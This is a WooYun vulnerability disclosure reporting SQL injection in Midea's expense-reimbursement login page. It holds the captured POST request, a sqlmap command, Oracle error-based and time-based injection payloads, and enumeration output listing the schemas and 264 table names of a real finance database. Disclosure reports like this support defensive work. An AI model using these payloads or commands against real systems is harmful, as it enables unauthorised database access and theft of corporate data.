当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160327

漏洞标题:美的多站漏洞SQL注入漏洞/弱口令(涉及大量敏感数据)

相关厂商:midea.com

漏洞作者: 心云

提交时间:2015-12-11 17:37

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

求上个首页,谢谢审核大大^_^

详细说明:

0X01 首先是sql注入漏洞
漏洞地址:

http://jders.midea.com.cn/Login.aspx


网上报账系统.png


经过简单测试发现并没有过滤

网上报账系统单引号报错.png


burp抓包
post.txt:

POST /Login.aspx?_dc=1449797912532 HTTP/1.1
Accept: */*
X-Ext.Net: delta=true
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://jders.midea.com.cn/Login.aspx
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: jders.midea.com.cn
Content-Length: 3065
Pragma: no-cache
__EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-%7Cpublic%7CbtLoginClick&__VIEWSTATE=%2FwEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDxYCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTUROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVGd5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFCsEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFgIfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=%2FwEWAgK0u6rDCwLk1b%2BVAi55K9r446%2BWQ%2F9WWUM6RazKyEiocm%2B1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng%3D%3D&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ%3D%3D&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU%3D&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY%3D&lb8=


sqlmap命令:

sqlmap.py -r post.txt --dbs -p tbUid --dbms oracle


结果:

injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
POST parameter 'tbUid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:
---
Parameter: tbUid (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH&tbPwd=d
d&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDx
YCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAm
YPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTU
ROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVG
d5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFC
sEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFg
IfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFg
IfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2
xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEi
ocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0
Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=
---
[09:47:40] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
[09:47:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[09:47:40] [INFO] fetching database (schema) names
[09:47:49] [INFO] the SQL query used returns 8 entries
[09:47:53] [INFO] retrieved: CTXSYS
[09:47:56] [INFO] retrieved: EXFSYS
[09:48:00] [INFO] retrieved: JD_ERS
[09:48:03] [INFO] retrieved: MDSYS
[09:48:07] [INFO] retrieved: OLAPSYS
[09:48:10] [INFO] retrieved: SYS
[09:48:13] [INFO] retrieved: SYSTEM
[09:48:16] [INFO] retrieved: WLEAM
available databases [8]:
[*] CTXSYS
[*] EXFSYS
[*] JD_ERS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] WLEAM


涉及8个数据库:

8个数据库.png


当前库的所有表:

Database: JD_ERS
[264 tables]
+-------------------------------+
| A                             |
| A1                            |
| A2                            |
| ACCOUNT_TEST                  |
| AF_APPLY_DETAIL_BUSI          |
| AF_APPLY_DETAIL_CULTIVATE     |
| AF_APPLY_DETAIL_EVENCTION     |
| AF_APPLY_DETAIL_TEAM          |
| AF_APPLY_DETAIL_UNIVERSAL     |
| AF_APPLY_MAIN                 |
| AM_MAIL_TEMPLATE              |
| AM_MAIL_TEMPLATE_WF           |
| AM_SEND_MAIL_LOG              |
| AP_PAYMENT_BILL_BACK          |
| AP_PAYMENT_BUDGET_ALL         |
| AP_PAYMENT_HEADER             |
| AP_PAYMENT_INTERFACE          |
| AP_PAYMENT_LINE               |
| AP_PAYMENT_SCHEDULE_DETAIL    |
| AP_PAYMENT_SCHEDULE_HEADER    |
| AP_PAYMENT_SCHEDULE_LINE      |
| AP_PAYMENT_SCHEDULE_RELATION  |
| AP_PAYMENT_ZK_ALL             |
| AUTHORITY_ORG_BUDGET          |
| AUTHORITY_ORG_BUDGET_DETAIL   |
| AUTHORITY_USER_DETAIL         |
| B                             |
| BAOSI_REQUIRE_LOG             |
| BAOSI_REQUIRE_RIGHT           |
| BAOSI_SYS_PROJECT             |
| BAS_ACCOUNT_TITLE             |
| BAS_ACCOUNT_TITLE_DEPT        |
| BAS_ACCOUNT_TITLE_OUTLAY      |
| BAS_AREA                      |
| BAS_AREA_CITY                 |
| BAS_ATTACHMENT                |
| BAS_BILL_NUMBER_ITEM          |
| BAS_BILL_NUMBER_MAIN          |
| BAS_BILL_NUMBER_RIGHT         |
| BAS_BUDGET_AUTHORITY_DETAIL   |
| BAS_BUDGET_AUTHORITY_MAIN     |
| BAS_BUDGET_AUTHORITY_USERS    |
| BAS_COSTCENTER                |
| BAS_COSTINFORMATION_DATA      |
| BAS_COST_ITEM                 |
| BAS_CURRENCY                  |
| BAS_EMAIL                     |
| BAS_ENTERTAIN                 |
| BAS_ERP_SYNCHRONOUS           |
| BAS_EXCHANGE                  |
| BAS_HOLIDAY                   |
| BAS_LEVEL_AREA                |
| BAS_LEVEL_POST                |
| BAS_MIP_NOTIFY_INTERFACE      |
| BAS_MODULE_MANAGEMENT         |
| BAS_MODULE_WORKFLOW           |
| BAS_ORG                       |
| BAS_ORGANIZATION              |
| BAS_ORG_RIGHT                 |
| BAS_OUTLAY_ITEM_DATA          |
| BAS_PAYMENT                   |
| BAS_PERSONAL                  |
| BAS_POSTLEVEL_TEMP            |
| BAS_POSTLEVLE                 |
| BAS_PRIVATETOPUBLICCAR_DATA   |
| BAS_PUBLICCAR_DATA            |
| BAS_SECRETLEVEL_DATA          |
| BAS_SECTION_CUSTOMER          |
| BAS_SECTION_OFFICE            |
| BAS_SUBJECT                   |
| BAS_SUBJECT_DEPT              |
| BAS_SYNC_ERRITEMS             |
| BAS_SYNC_LOG                  |
| BAS_TELEPHONE_DATA            |
| BAS_TEMPLATE                  |
| BAS_TRAVEL_EXPENSE            |
| BAS_URGENCYLEVEL_DATA         |
| BAS_VENDOR                    |
| BD_BUDGET                     |
| BD_BUDGET_0804                |
| BD_BUDGET_20150208            |
| BD_BUDGET_20150302            |
| BD_BUDGET_20150822            |
| BD_BUDGET_20150825            |
| BD_BUDGET_ADD_DETAIL          |
| BD_BUDGET_ADD_MAIN            |
| BD_BUDGET_ADJUST_DETAIL       |
| BD_BUDGET_ADJUST_MAIN         |
| BD_BUDGET_APPLY_DETAIL        |
| BD_BUDGET_APPLY_ITEM          |
| BD_BUDGET_APPLY_MAIN          |
| BD_BUDGET_F064                |
| BD_BUDGET_F080                |
| BD_BUDGET_INPUT_DETAIL        |
| BD_BUDGET_INPUT_MAIN          |
| BD_BUDGET_LOCK_REC            |
| BD_BUDGET_ORG                 |
| BD_BUDGET_ORG_0804            |
| BD_BUDGET_ORG_COL             |
| BD_BUDGET_ORG_COL_0804        |
| BD_BUDGET_ORG_DEPART          |
| BD_BUDGET_ORG_DEPART_0804     |
| BD_BUDGET_ORG_USER            |
| BD_BUDGET_ORG_USER_0804       |
| BD_BUDGET_T                   |
| BD_BUDGET_TEMP1               |
| BD_BUDGET_TEMP2               |
| BD_BUDGET_TEMP3               |
| BD_BUDGET_TEMPLATE_DETAIL     |
| BD_BUDGET_TEMPLATE_MAIN       |
| BD_BUDGET_TEMP_ZF             |
| BD_BUDGET_TEST                |
| BD_ORG                        |
| BD_TEST                       |
| BD_ZF_DR                      |
| BD_ZF_DR_2015                 |
| BEE_ELECTRONICINVOICE         |
| BEE_ELECTRONICINVOICEREL      |
| BEE_ELECTRONICINVOICEREL_TEMP |
| BEE_ELECTRONICINVOICE_TEMP    |
| BEE_INTERFACE_LIST            |
| BEE_SYNC_LOG                  |
| BEE_TICKETBILLRELATION        |
| BEE_TICKETBILLRELATION_TEMP   |
| BEE_TICKETORDER               |
| BEE_TICKETORDER_TEMP          |
| BEE_TICKETSETTLEMENT          |
| BEE_TICKETSETTLEMENTREL       |
| BEE_TICKETSETTLEMENTREL_TEMP  |
| BEE_TICKETSETTLEMENT_TEMP     |
| BILL_RIGHT_DEPT               |
| BILL_RIGHT_EMP                |
| BILL_RIGHT_MAIN               |
| BILL_RIGHT_MENU               |
| BILL_TYPECODE_DATA            |
| BUDGET_TEST                   |
| C                             |
| CASH_RECEIPT_INPUT            |
| CASH_RECEIPT_INTERFACE        |
| CASH_RECEIPT_LINE             |
| CASH_RECEIPT_MAIN             |
| CASH_RECEIPT_MARK_DETAIL      |
| CASH_RECEIPT_MARK_HEADER      |
| CASH_RECEIPT_MARK_LINE        |
| CASH_RECEIPT_MARK_RELATION    |
| DEPARTMENTNUMBER_TMP          |
| DETAIN_AGREEMENT_HEADER       |
| ERS_LOGS                      |
| FD_ADVANCE                    |
| FD_INVOICE                    |
| FD_LOAN                       |
| FD_PAYABLE_DETAIL             |
| FD_PAYABLE_MAIN               |
| FD_PAYMENT_REC                |
| FD_REFUND                     |
| FD_REFUND_DETAIL              |
| FD_VERFICATION                |
| FD_VERFICATION_DETAIL         |
| IMG_BILLCODE_STATUS_INTERFACE |
| IMG_SYNC_SET                  |
| LSS_067                       |
| MP_MERGE_PAYMENT_DETAIL       |
| MP_MERGE_PAYMENT_MAIN         |
| MV_ERP_BANK_ACCOUNTS          |
| MV_ERP_BUDGET_DETAIL          |
| MV_ERP_CURRENCY               |
| MV_ERP_DETAIL_SUBJECT         |
| MV_ERP_EXCHANGE               |
| MV_ERP_GL_CODE_COMBINATIONS   |
| MV_ERP_PAYMENT_DOCUMENTS      |
| MV_ERP_PAY_REC                |
| MV_ERP_PAY_REC_TEST           |
| MV_ERP_SUPPLIER               |
| MV_ERP_SUPPLIER_SITE          |
| MV_ERP_TERMS                  |
| PARTS                         |
| PBCATCOL                      |
| PBCATEDT                      |
| PBCATFMT                      |
| PBCATTBL                      |
| PBCATVLD                      |
| RP_DEIFINED_ORG_BUDGET        |
| RS_BUSI_DETAIL                |
| RS_COST_BEE_DETAIL            |
| RS_COST_DETAIL                |
| RS_COST_MAIN                  |
| RS_TRAVELLING_BEE_DETAIL      |
| RS_TRAVELLING_DETAIL          |
| RS_TRAVELLING_MAIN            |
| S010                          |
| S011                          |
| S011_TEMP                     |
| S012                          |
| S012_TEMP                     |
| S012_TEMP_ZF                  |
| S020                          |
| S021                          |
| S022                          |
| S023                          |
| S024                          |
| S027                          |
| S033                          |
| S034                          |
| S035                          |
| S036                          |
| S037                          |
| S040                          |
| S041                          |
| S050                          |
| S080                          |
| S081                          |
| S201                          |
| S202                          |
| S203                          |
| S204                          |
| S205                          |
| S206                          |
| S207                          |
| S208                          |
| S209                          |
| S210                          |
| S211                          |
| S212                          |
| S213                          |
| S214                          |
| S215                          |
| S220                          |
| S231                          |
| S232                          |
| S240                          |
| S241                          |
| S242                          |
| S243                          |
| S250                          |
| S251                          |
| S252                          |
| S261                          |
| S263                          |
| S264                          |
| S265                          |
| S266                          |
| S267                          |
| S268                          |
| SHARE_ACCOUNTS                |
| SHARE_DETAIL                  |
| SHARE_MAIN                    |
| SMS_SEND                      |
| SMS_SEND_HISTORY              |
| SMS_SYS_CONFIG                |
| SUBJECT_TEST                  |
| SUPPLIER_BANK_ACCOUNTS        |
| TEMP_ORACLEPANEL              |
| TEMP_SVXBAR                   |
| TEMP_TABLESPACE               |
| TEST1                         |
| USER_TEMP                     |
| ZF_ACCOUNT                    |
| ZF_COSTCENTER                 |
